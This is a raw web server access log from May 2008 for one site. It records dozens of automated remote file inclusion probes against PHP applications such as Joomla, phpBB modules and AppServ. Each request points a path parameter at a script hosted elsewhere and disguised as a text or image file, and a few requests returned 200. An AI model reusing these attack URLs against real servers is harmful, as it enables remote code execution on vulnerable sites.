74.208.66.166 - - [29/May/2008:10:07:41 -0700] "GET /logs/main.php?x=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.66.166 - - [29/May/2008:10:07:41 -0700] "GET /main.php?x=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.228.241 - - [29/May/2008:10:07:47 -0700] "GET /logs/access.log//atom.php5?page=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:08:17 -0700] "GET /logs/access.log//includes/messages.inc.php?include_path=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:08:17 -0700] "GET //includes/messages.inc.php?include_path=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:08:18 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.70.125.187 - - [29/May/2008:10:08:27 -0700] "GET /logs/access_080128.log//index.php/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.112.2 - - [29/May/2008:10:08:30 -0700] "GET /logs/access_080401.log//ashnews.php?pathtoashnews=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.112.2 - - [29/May/2008:10:08:30 -0700] "GET //ashnews.php?pathtoashnews=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.112.2 - - [29/May/2008:10:08:30 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:10:08:31 -0700] "GET /logs/access_080201.log//modules/xfsection/modify.php?dir_module=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.126.175.155 - - [29/May/2008:10:08:49 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.usa-westen.info/Fotos/save.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
75.126.175.155 - - [29/May/2008:10:08:49 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.usa-westen.info/Fotos/save.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.87.22.58 - - [29/May/2008:10:09:18 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
90.158.114.6 - - [29/May/2008:10:09:24 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.bestpaket.ru/netcat//dump/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
90.158.114.6 - - [29/May/2008:10:09:25 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.bestpaket.ru/netcat//dump/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:10:09:25 -0700] "GET /logs/access_080209.log//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.70.125.187 - - [29/May/2008:10:09:34 -0700] "GET /logs/access_080116.log//index.php/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.125.187 - - [29/May/2008:10:09:36 -0700] "GET //index.php/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.125.187 - - [29/May/2008:10:09:36 -0700] "GET /logs//index.php/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
90.158.114.6 - - [29/May/2008:10:09:43 -0700] "GET /logs/access_080308.log/index.php?redir=http://www.bestpaket.ru/netcat//dump/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.149.226.176 - - [29/May/2008:10:09:45 -0700] "GET /logs/access.log/?page=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.226.176 - - [29/May/2008:10:09:45 -0700] "GET /logs/?page=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 200 49558 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.226.176 - - [29/May/2008:10:09:47 -0700] "GET /?page=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
213.148.252.24 - - [29/May/2008:10:09:50 -0700] "GET /logs//phphtml.php?htmlclass_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.148.252.24 - - [29/May/2008:10:09:51 -0700] "GET //phphtml.php?htmlclass_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.226.176 - - [29/May/2008:10:10:04 -0700] "GET /logs/access_080228.log/?page=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.42.110.250 - - [29/May/2008:10:10:08 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://www.ctocnet-socal.org/pages/back.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [29/May/2008:10:10:18 -0700] "GET //phphtml.php?htmlclass_path=http://www.aviationdimension.com/mediagallery/g2data/sessions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.112.2 - - [29/May/2008:10:10:23 -0700] "GET //ashnews.php?pathtoashnews=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.112.2 - - [29/May/2008:10:10:23 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.2.100.138 - - [29/May/2008:10:10:37 -0700] "GET /logs//phphtml.php?htmlclass_path=http://www.aviationdimension.com/mediagallery/g2data/sessions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.112.2 - - [29/May/2008:10:10:39 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.112.2 - - [29/May/2008:10:10:40 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:10:11:04 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:10:11:10 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.112.2 - - [29/May/2008:10:11:12 -0700] "GET //ashnews.php?pathtoashnews=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.100.220.41 - - [29/May/2008:10:11:12 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:10:11:15 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.86.101.159 - - [29/May/2008:10:11:18 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.87.22.58 - - [29/May/2008:10:11:34 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
65.87.22.58 - - [29/May/2008:10:11:34 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
65.87.22.58 - - [29/May/2008:10:11:34 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
216.120.241.242 - - [29/May/2008:10:11:42 -0700] "GET /logs/access_080215.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.112.2 - - [29/May/2008:10:12:02 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.112.2 - - [29/May/2008:10:12:02 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.112.2 - - [29/May/2008:10:12:03 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
218.234.21.89 - - [29/May/2008:10:12:10 -0700] "GET /index2.php?content=http://museo.infoitos.com//components/com_rwcards/y.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
218.234.21.89 - - [29/May/2008:10:12:10 -0700] "GET /logs/index2.php?content=http://museo.infoitos.com//components/com_rwcards/y.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
194.158.195.132 - - [29/May/2008:10:12:13 -0700] "GET /logs/access_080327.log/ndex.php?_REQUEST=&_REQUEST%5boption%5d=com_simpleboard&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:10:12:18 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:10:12:18 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
65.87.22.58 - - [29/May/2008:10:12:20 -0700] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
85.17.103.109 - - [29/May/2008:10:12:32 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:32 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:32 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:32 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:32 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:33 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:33 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:33 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:34 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:34 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:34 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:34 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:34 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:34 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:34 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:35 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:35 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:35 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:35 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:35 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:36 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:36 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:36 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:36 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:36 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:36 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:37 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:37 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:38 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:38 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:38 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:38 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:38 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:39 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:39 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:39 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:39 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
74.52.112.2 - - [29/May/2008:10:12:48 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:52 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:54 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:55 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:12:57 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
82.78.216.197 - - [29/May/2008:10:13:00 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.15.88.10 - - [29/May/2008:10:13:27 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.88.10 - - [29/May/2008:10:13:28 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.88.10 - - [29/May/2008:10:13:28 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [29/May/2008:10:13:29 -0700] "GET //config/dbutil.bck.php?confdir=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.87.22.58 - - [29/May/2008:10:13:33 -0700] "GET //citywriter/head.php?path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
216.70.125.187 - - [29/May/2008:10:13:56 -0700] "GET /logs/access_080128.log//index.php/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.87.22.58 - - [29/May/2008:10:13:58 -0700] "GET /logs/access.log//citywriter/head.php?path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
65.87.22.58 - - [29/May/2008:10:13:58 -0700] "GET //citywriter/head.php?path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
65.87.22.58 - - [29/May/2008:10:13:58 -0700] "GET /logs//citywriter/head.php?path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.6.123.99 - - [29/May/2008:10:14:00 -0700] "GET /logs/access_080330.log//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
75.125.252.82 - - [29/May/2008:10:14:06 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.252.82 - - [29/May/2008:10:14:06 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.6.123.99 - - [29/May/2008:10:14:15 -0700] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
